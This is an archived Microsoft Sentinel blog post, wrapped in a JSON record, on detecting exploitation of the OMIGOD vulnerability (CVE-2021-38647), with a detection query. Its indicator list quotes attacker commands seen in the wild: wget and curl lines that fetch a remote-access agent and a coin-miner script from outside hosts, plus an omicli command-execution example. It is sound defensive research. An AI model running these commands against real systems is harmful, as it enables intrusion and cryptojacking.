{
	"id": "94c0a89d-9e02-4e88-b837-9c875ec48fbf",
	"created_at": "2026-04-06T01:30:29.515401Z",
	"updated_at": "2026-04-10T03:20:44.063643Z",
	"deleted_at": null,
	"sha1_hash": "24e45f419cf7fb1521dd57c704036b0e68a2f72e",
	"title": "Hunting for OMI Vulnerability Exploitation with Azure Sentinel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 247874,
	"plain_text": "Hunting for OMI Vulnerability Exploitation with Azure Sentinel\r\nBy russmc\r\nPublished: 2021-09-18 · Archived: 2026-04-06 00:15:41 UTC\r\n1. Microsoft Community Hub\r\n2.\r\n3. Microsoft Sentinel\r\n4. Microsoft Sentinel Blog\r\nBlog Post\r\nMicrosoft Sentinel Blog\r\n8 MIN READ\r\nSep 18, 2021\r\nRussell McDonald, Roberto Rodriguez, and Ajeet Prakash\r\nSpecial thanks to: Ross Bevington \r\nFollowing the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)\r\nin the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)\r\nhave been monitoring for signs of exploitation and investigating detections to further protect customers. Following the\r\nMSRC guidance to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this\r\nblog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders\r\nto look for on host machines, and to share new detections in Azure Sentinel.\r\nAt Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,\r\nand to improve the detection coverage of our security offerings.  As part of that work, MSTIC is monitoring for exploitation\r\nof the OMI related RCE (CVE-2021-38647).  To date we have seen several active exploitation attempts ranging from basic\r\nhost enumeration (running uname, id, ps commands) to attempts to install a crypto currency miner or file share. (Details\r\navailable below in Hunting cues section). We have also seen others in the community report similar behavior to include\r\ninstalls of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270. \r\nDue to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we\r\nare anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).\r\nOMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is\r\nalso designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a\r\nmuch more viable CIM Object Manager for embedded systems and other infrastructure components that have memory\r\nconstraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most\r\nUNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.\r\nIn a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can\r\nexecute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401\r\nunauthorized response. However, the user is able to execute commands with root privileges.\r\nMore details are available in the MSRC CVE-2021-38647 post and the finder company Wiz blog post.\r\nIn addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to\r\nexplore at the endpoint level.\r\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\r\nMicrosoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.\r\nThe SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux\r\nsystem. There are several providers or classes available through the SCXcore provider which can be used to gather\r\ninformation from an endpoint such as  MemoryStatisticalInformation or FileSystemStatisticalInformation.\r\nIn addition, there is one support provider named the RunAsProvider which provides the following classes:\r\nExecuteCommand: Executes any UNIX/Linux native command\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 1 of 38\n\nExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell\r\nExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell\r\nBased on the initial research from Wiz, the following command was used to explore network traffic in order to craft an\r\nHTTP request to test the vulnerability:\r\n/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem }\r\nExecuteShellCommand { command 'id' timeout 0 }\r\nDuring testing, we used the Scxadmin tool, available as part of SCX, to increase all logging to VERBOSE and identify\r\nadditional sources of data. The following command was used:\r\n/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose\r\nAfter running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the\r\nRunAsProvider :: Invoke_ExecuteShellCommand class:\r\nChecking logs from auditd via Syslog, we also identified where the code was being executed from:\r\nWe tested the same in our lab environments, and we observed the same behavior which is shown below:\r\nLooking at the code behind the components of the RunAs providers, there are some references to it:\r\nMore information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider\r\nfor Operations Manager\r\nSimilarly, scripts can be run using the ExecuteScript provider. In this case, the body of the http request contains a reference\r\nto ExecuteScript.  In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:\r\nIn this case, the script is passed into a temp directory which you can see in the execve logs. Look for a commandline similar\r\nto /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same\r\n/var/opt/microsoft/scx/tmp current working directory.\r\nOf note, this is the method we have seen used with attackers attempting to install coin miners.\r\nAzure Sentinel coverage\r\nRelevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel\r\nhas made it easy to collect the data from multiple data sources easily. This section of the post contains guidance and generic\r\napproaches to look for the OMI related activity in various data feeds that are available by default in Azure Sentinel or can be\r\nonboarded to Azure Sentinel.\r\nSome Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.\r\nAttackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via\r\nHTTPS to port listening to OMI to gain initial access to the machine.\r\nThe Azure Sentinel query linked below tries to identify connection attempts from the external IP addresses to the OMI\r\nmanagement ports (5985,5986,1270). The query primarily leverages the Network Session normalization schema\r\n(imNetworkSession)  as well as a few other logs to look for this network connection activity from an external IP address.\r\nWhere available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the\r\nquery has been shipped as a hunting query.\r\nNormalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be\r\ndeployed in a click using an ARM Template.\r\nCustomers can also use Heartbeat logs that monitors agent health to find vulnerable machine. The Azure Sentinel query\r\nlinked below tries to leverage Heartbeat data to find OMS-agents that are reporting to the Azure Sentinel workspace but are\r\nnot updated to the latest version that prevents this vulnerability.\r\n[updated Sept 27, 2021]\r\nAdditionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an\r\nAzure Environment with OMI installed. With the continuous export feature of Security Center, these security\r\nrecommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data populated in Security Nested\r\nRecommendations table to build a detection query to show vulnerable machines.\r\nAzure Service Health has also sent notifications to potentially impacted customers. In the impacted environments where\r\ncustomers can run a quick query to check if they are impacted by this Vulnerability.\r\nAzureActivity\r\n| where CategoryValue == 'ServiceHealth'\r\n| where isnotempty(Properties) and Properties has 'CVE-2021-38645'\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 2 of 38\n\n| extend defaultLanguageTitle =\r\ntostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)\r\n[updated Sept 24, 2021]\r\nThe below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure\r\nSentinel Syslog data connector to explore the use of SCX Execute RunAs providers.\r\nExecute RunAs providers such as the ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux\r\ncommand and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and\r\ndepending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider\r\nis used, then the script file is created in the following directory /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx\r\n(e.g. scxzOy96). SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of\r\nproducts including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.\r\nHunting cues and IOCs\r\nCommon enumeration\r\ncommands seen\r\nuname -a, id, netstat, ps\r\nExploitation attempt\r\nwget hxxps://www.dwservice.net/download/dwagent_generic.sh  -O\r\ndwagent_generic.sh\r\nExploitation attempt\r\necho curl hxxps://www.dwservice.net/download/dwagent_generic.sh  --output dw.sh\r\n\u003e go.sh\r\nExploitation attempt curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh\r\nScanning IPs 13.212.235.12\r\nScanning IPs 142.93.148.12\r\nScanning IPs 171.224.80.216\r\nScanning IPs 185.220.100.245\r\nScanning IPs 216.151.191.152\r\nScanning IPs 23.129.64.140\r\nScanning IPs 31.44.185.115\r\nScanning IPs 46.30.42.126\r\nScanning IPs 5.45.127.209\r\nScanning IPs 94.198.42.158\r\nReferences: \r\nMSRC communications:\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 3 of 38\n\nCVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution\r\nVulnerability\r\nAdditional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security\r\nResponse Center\r\nAzure Security Center Guidance:\r\nUsing ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech\r\nCommunity\r\nSentinel Detections:\r\nAzure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub\r\nAzure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub\r\nAzure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24,\r\n2021]\r\nSoftware and tools:\r\nGitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager\r\nGitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)\r\nAzure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go\r\n(github.com)\r\nPublic Discussion About Attacks in the wild:\r\nchris doman on Twitter: \":loudspeaker:OMIGOD (CVE-2021-38647) is now under active exploitation :loudspeaker:\r\nWe took at a look at one of the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI\r\nis installed https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3\" / Twitter\r\nAndrew Morris on Twitter: \"The Azure \"OHMIGOD\" vulnerability (CVE-2021-38647) is increasing a good bit. ~10\r\nIPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN users and\r\ncustomers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1\" / Twitter\r\nKevin Beaumont on Twitter: \"Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given\r\nMirai can enter networks and spread laterally via multiple vulns, this might be problematic.\r\nhttps://t.co/8nXSEcMHYa\" / Twitter\r\nUpdated Nov 03, 2021\r\nVersion 11.0\r\n\"}},\"componentScriptGroups({\\\"componentId\\\":\\\"custom.widget.SocialSharing\\\"})\":\r\n{\"__typename\":\"ComponentScriptGroups\",\"scriptGroups\":\r\n{\"__typename\":\"ComponentScriptGroupsDefinition\",\"afterInteractive\":\r\n{\"__typename\":\"PageScriptGroupDefinition\",\"group\":\"AFTER_INTERACTIVE\",\"scriptIds\":[]},\"lazyOnLoad\":\r\n{\"__typename\":\"PageScriptGroupDefinition\",\"group\":\"LAZY_ON_LOAD\",\"scriptIds\":[]}},\"componentScripts\":\r\n[]},\"component({\\\"componentId\\\":\\\"custom.widget.MicrosoftFooter\\\"})\":\r\n{\"__typename\":\"Component\",\"render({\\\"context\\\":{\\\"component\\\":{\\\"entities\\\":[],\\\"props\\\":{}},\\\"page\\\":{\\\"entities\\\":\r\n[\\\"message:2764093\\\"],\\\"name\\\":\\\"BlogMessagePage\\\",\\\"props\\\":\r\n{},\\\"url\\\":\\\"https://techcommunity.microsoft.com/blog/microsoftsentinelblog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/2764093\\\"}}})\":{\"__typename\":\"ComponentRenderResult\",\"html\":\"\r\n\"}},\"componentScriptGroups({\\\"componentId\\\":\\\"custom.widget.MicrosoftFooter\\\"})\":\r\n{\"__typename\":\"ComponentScriptGroups\",\"scriptGroups\":\r\n{\"__typename\":\"ComponentScriptGroupsDefinition\",\"afterInteractive\":\r\n{\"__typename\":\"PageScriptGroupDefinition\",\"group\":\"AFTER_INTERACTIVE\",\"scriptIds\":[]},\"lazyOnLoad\":\r\n{\"__typename\":\"PageScriptGroupDefinition\",\"group\":\"LAZY_ON_LOAD\",\"scriptIds\":[]}},\"componentScripts\":\r\n[]},\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/community/NavbarDropdownToggle\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageCoverImage\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageCoverImage-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/nodes/NodeTitle\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/nodes/NodeTitle-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageTimeToRead\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageTimeToRead-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 4 of 38\n\n1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageSubject\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageSubject-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/users/UserLink\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/users/UserLink-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/users/UserRank\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/users/UserRank-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageTime\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageTime-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageBody\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageBody-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageCustomFields\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageCustomFields-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageRevision\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageRevision-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/common/QueryHandler\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/common/QueryHandler-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/tags/TagList\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/tags/TagList-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageReplyButton\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageReplyButton-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageAuthorBio\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageAuthorBio-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/users/UserAvatar\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/ranks/UserRankLabel\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/ranks/UserRankLabel-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/tags/TagView/TagViewChip\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/tags/TagView/TagViewChip-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/users/UserRegistrationDate\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/users/UserRegistrationDate-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/nodes/NodeAvatar\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/nodes/NodeAvatar-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/nodes/NodeDescription\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/nodes/NodeDescription-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/nodes/NodeIcon\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/nodes/NodeIcon-1775111751222\"}]},\"Theme:customTheme1\":\r\n{\"__typename\":\"Theme\",\"id\":\"customTheme1\"},\"User:user:-1\":\r\n{\"__typename\":\"User\",\"id\":\"user:-1\",\"entityType\":\"USER\",\"eventPath\":\"community:gxcuf89792/user:-1\",\"uid\":-1,\"login\":\"Anonymous\",\"email\":\"\",\"ava\r\n{\"__typename\":\"RegistrationData\",\"status\":\"ANONYMOUS\",\"registrationTime\":null,\"confirmEmailStatus\":false,\"registrationAccessLevel\":\"VIEW\",\"ss\r\n[]},\"ssoId\":null,\"profileSettings\":{\"__typename\":\"ProfileSettings\",\"dateDisplayStyle\":\r\n{\"__typename\":\"InheritableStringSettingWithPossibleValues\",\"key\":\"layout.friendly_dates_enabled\",\"value\":\"false\",\"localValue\":\"true\",\"possibleValues\"\r\n[\"true\",\"false\"]},\"dateDisplayFormat\":\r\n{\"__typename\":\"InheritableStringSetting\",\"key\":\"layout.format_pattern_date\",\"value\":\"MMM dd yyyy\",\"localValue\":\"MM-dd-yyyy\"},\"language\":{\"__typename\":\"InheritableStringSettingWithPossibleValues\",\"key\":\"profile.language\",\"value\":\"en-US\",\"localValue\":null,\"possibleValues\":[\"en-US\",\"es-ES\"]},\"repliesSortOrder\":\r\n{\"__typename\":\"InheritableStringSettingWithPossibleValues\",\"key\":\"config.user_replies_sort_order\",\"value\":\"DEFAULT\",\"localValue\":\"DEFAULT\",\"po\r\n[\"DEFAULT\",\"LIKES\",\"PUBLISH_TIME\",\"REVERSE_PUBLISH_TIME\"]}},\"deleted\":false},\"CachedAsset:pages-1775111737889\":{\"__typename\":\"CachedAsset\",\"id\":\"pages-1775111737889\",\"value\":\r\n[{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogViewAllPostsPage\",\"type\":\"BLOG\",\"urlPath\":\"/category/:categoryId/blog/:boardId/all-posts/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 5 of 38\n\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CasePortalPage\",\"type\":\"CASE_PORTAL\",\"urlPath\":\"/caseportal\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CreateGroupHubPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/groups/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CaseViewPage\",\"type\":\"CASE_DETAILS\",\"urlPath\":\"/case/:caseId/:caseNumber\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"InboxPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/inbox\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"HelpFAQPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/help\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaMessagePage\",\"type\":\"IDEA_POST\",\"urlPath\":\"/idea/:boardId/:messageSubject/:messageId\",\"__typename\":\"PageDescriptor\"},\"__typename\"\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaViewAllIdeasPage\",\"type\":\"IDEA\",\"urlPath\":\"/category/:categoryId/ideas/:boardId/all-ideas/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"LoginPage\",\"type\":\"USER\",\"urlPath\":\"/signin\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"WorkstreamsPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/workstreams\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogPostPage\",\"type\":\"BLOG\",\"urlPath\":\"/category/:categoryId/blogs/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageRes\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"UserBlogPermissions.Page\",\"type\":\"COMMUNITY\",\"urlPath\":\"/c/user-blog-permissions/page\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ThemeEditorPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/designer/themes\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbViewAllArticlesPage\",\"type\":\"TKB\",\"urlPath\":\"/category/:categoryId/kb/:boardId/all-articles/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1730819800000,\"localOverride\":null,\"page\":\r\n{\"id\":\"AllEvents\",\"type\":\"CUSTOM\",\"urlPath\":\"/Events\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OccasionEditPage\",\"type\":\"EVENT\",\"urlPath\":\"/event/:boardId/:messageSubject/:messageId/edit\",\"__typename\":\"PageDescriptor\"},\"__typename\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OAuthAuthorizationAllowPage\",\"type\":\"USER\",\"urlPath\":\"/auth/authorize/allow\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"PageEditorPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/designer/pages\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"PostPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/category/:categoryId/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResou\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CreateUserGroup.Page\",\"type\":\"COMMUNITY\",\"urlPath\":\"/c/create-user-group/page\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumBoardPage\",\"type\":\"FORUM\",\"urlPath\":\"/category/:categoryId/discussions/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"Pag\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbBoardPage\",\"type\":\"TKB\",\"urlPath\":\"/category/:categoryId/kb/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"EventPostPage\",\"type\":\"EVENT\",\"urlPath\":\"/category/:categoryId/events/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageR\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"UserBadgesPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/users/:login/:userId/badges\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResourc\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"GroupHubMembershipAction\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/membership/join/:nodeId/:membershipType\",\"__typename\":\"PageDescriptor\"}\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"MaintenancePage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/maintenance\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaReplyPage\",\"type\":\"IDEA_REPLY\",\"urlPath\":\"/idea/:boardId/:messageSubject/:messageId/comments/:replyId\",\"__typename\":\"PageDescripto\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"UserSettingsPage\",\"type\":\"USER\",\"urlPath\":\"/mysettings/:userSettingsTab\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"GroupHubsPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/groups\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumPostPage\",\"type\":\"FORUM\",\"urlPath\":\"/category/:categoryId/discussions/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OccasionRsvpActionPage\",\"type\":\"OCCASION\",\"urlPath\":\"/event/:boardId/:messageSubject/:messageId/rsvp/:responseType\",\"__typename\":\"Pag\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 6 of 